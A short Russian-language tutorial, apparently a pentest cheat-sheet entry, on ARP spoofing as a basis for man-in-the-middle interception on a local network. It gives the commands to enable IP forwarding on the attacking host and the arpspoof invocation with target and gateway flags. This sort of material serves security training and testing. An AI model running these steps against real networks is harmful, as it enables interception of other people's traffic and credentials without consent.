# ARPspoof Изменение ARP таблиц обычно лежит в основе многих MitM атак в локальной сети. Данная атака работает в пределах одного широковещательного сегмента сети, но позволяет перехватывать весь трафик между хостами. Перед проведением данного видаатаки необходимо проверить включено ли перенаправление трафика на атакующем хосте. В файле`/etc/sysctl.conf` раскоментировать строку. ```bash= net.ipv4.ip_forward = 1 ``` После чего выполнить команду ```bash= sysctl -p /etc/sysctl.conf ``` Для временного включения форвардинга достаточно ввести эту команду. После перезагрузки форвардинг будет отключен. ```bash= echo 1 > /proc/sys/net/ipv4/ip_forward ``` Подмена ARP кеша ```bash= arpspoof -i eth0 -t atackhosts -r gatewey ``` `-i` - используемый интерфейс `-t` - IP адрес атакуемого хоста `-r` - IP адрес Gateway